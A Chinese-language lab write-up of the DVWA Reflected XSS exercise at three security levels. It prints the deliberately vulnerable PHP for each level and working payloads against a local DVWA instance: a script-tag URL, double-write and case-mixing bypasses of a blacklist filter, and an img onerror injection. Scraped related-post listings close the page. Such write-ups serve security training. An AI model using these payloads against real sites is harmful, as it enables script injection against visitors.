DVWA-Reflected XSS
文章目录
- Reflected XSS Source(Low)
- 代码分析
- 漏洞利用
- Reflected XSS(Medium)
- 代码分析
- 漏洞利用
- 双写绕过
- 大小写混淆绕过
- Reflected XSS(High)
- 代码分析
- 漏洞利用
Reflected XSS Source(Low)
vulnerabilities/xss_r/source/low.php
代码分析
<?php header ("X-XSS-Protection: 0"); // Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Feedback for end userecho '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
} ?>
$_GET[ ‘name’ ]无任何过滤
漏洞利用
输入,成功弹框:
http://127.0.0.1/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Ealert%28233%29%3C%2Fscript%3E
Reflected XSS(Medium)
代码分析
<?php header ("X-XSS-Protection: 0"); // Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input$name = str_replace( '<script>', '', $_GET[ 'name' ] ); // Feedback for end userecho "<pre>Hello ${name}</pre>";
} ?>
可以看到,这里对输入进行了过滤,基于黑名单的思想,使用str_replace函数将
输入中的<script>
删除,这种防护机制是可以被轻松绕过的。
漏洞利用
双写绕过
输入<sc<script>ript>alert(233)</script>
,成功弹框:
大小写混淆绕过
输入<ScRipt>alert(233)</script>
,成功弹框:
Reflected XSS(High)
代码分析
<?php header ("X-XSS-Protection: 0"); // Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) { // Get input$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] ); // Feedback for end userecho "<pre>Hello ${name}</pre>";
} ?>
$name = preg_replace( ‘/<(.)s(.)c(.)r(.)i(.)p(.)t/i’
使用黑名单过滤输入,preg_replace()函数用于正则表达式的搜索和替换,这使得双写绕过、大小写混淆绕过(正则表达式中i表示不区分大小写)不再有效。
漏洞利用
虽然无法使用<script>
标签注入XSS代码,但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。
输入<img src=1 onerror=alert(/233/)>
,成功弹框:
DVWA-Reflected XSS相关推荐
- DVWA之XSS (完整版)
List item DVWA之XSS 文章目录 DVWA之XSS *Reflected XSS* Security Level: Low Security Level: Medium 1.双写绕过 2 ...
- DVWA测试XSS跨站脚本攻击三种类型
Xss主要分为三类,反射型,DOM型.存储型. 反射型 反射型XSS的定义是.如果URL地址当中的恶意参数会直接被输出到页面中,导致攻击代码被触发,便称之为反射型XSS,如下图所 DOM型 DOM X ...
- DVWA之XSS (Reflected)
XSS,全称Cross Site Scripting,即跨站脚本攻击,也相当于是一种代码注入攻击,hacker在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行(这里要说明下 ...
- DVWA 之 XSS(Reflected)反射型XSS
目录 1.级别:Low 2.级别:Medium 3.级别:High 4.级别:Impossible 反射型XSS攻击 又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS.漏洞产生的原因是攻击者注入 ...
- DVWA 反射型XSS XSS(Reflected)题解
low 首先输入最基础的 <script>alert("1")</script> 发现弹窗成功. 重置数据库,试一下能不能爆出cookie. <scr ...
- DVWA靶场 XSS
目录 XSS(跨站脚本攻击) payload 1.反射型XSS 2.存储型XSS 3.DOM型xss XSS(跨站脚本攻击) payload <script>alert("xss ...
- DVWA指点迷津-XSS(DOM)
DOM Based XSS 特点 既可能是反射型,也可能是存储型.利用前端的DOM树来造成XSS攻击. 漏洞危害 泄露用户的Cooike 泄露用户的IP地址.浏览器信息 篡改网页 XSS钓鱼 DVWA ...
- DVWA上XSS(DOM)(基于 DOM 的跨站脚本)全难度
跨站脚本攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言. DOM是一个 ...
- DVWA靶机-反射性XSS漏洞(Reflected)
DVWA靶机-反射性XSS漏洞(Reflected) DVWA靶机-暴力破解(Brute Force) && DVWA靶机的四个安全等级 DVWA靶机-命令注入漏洞(Command I ...
- DVWA——XSS(Reflected)——多种方法实现+详细步骤图解+获取cookie的利用过程演示
一)XSS(Reflected)介绍: 反射型xss(非持久型):需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的页面和内容),一般容易出现在搜索页面.特点:弹窗警告.广告:javas ...
最新文章
- 2019第四周作业(基础作业+挑战作业)
- php 打印mysql错误日志_PHP error_log()函数处理错误日志
- Python函数的正确用法及其注意事项
- oracle基础授权,Oracle基础学习3--Oracle创建用户并授权
- Chrome跨域问题
- 【Python】利用pip下载Django超时失败的解决方法
- Docker容器(container)详解
- JavaSE----变量、String、运算符、流程控制
- 网页显示mysql数据库到表格数据_在网页中如何将数据库的数据显示出来
- HDU 5009 Paint Pearls
- leetcode 14天刷题计划-数据结构入门(共计33题)
- ORACLE 8023学习总结
- 论文阅读 -- unsupervised triplet hashing for fast image retrieval笔记
- cotex单片机寄存器(cm3为例)
- 温度滞回程序C语言,滞回比较器在温度控制器中的作用
- java校验集装箱柜号是否正确
- 没有音响,把手机当作电脑音响的操作。
- 黑马-linux编程
- 双节将至,XMind给你最好的礼遇
- Javaweb开发入职第一天
热门文章
- win8服务器防火墙配置文件,Win8自带防火墙吗,Win8防火墙在哪里(适用于Win8.1)?
- 计算机无法共享的原因,文件夹无法共享的原因及其解决办法
- JT/T808模拟器、企业压测工具使用
- 【新书速递】实用安全多方计算导论
- Matlab读取excel并使用拉依达准则筛选数据
- Vue2,Webpack的基础配置以及使用脚手架创建工程
- 图元变形lisp源码_修改图元图层lisp
- 购买腾讯云服务器流程
- 7070mt安装ubuntu dell_戴尔(dell)7070MT台式机装win7系统及分区教程(支持usb驱动)
- iphone配置Charles抓包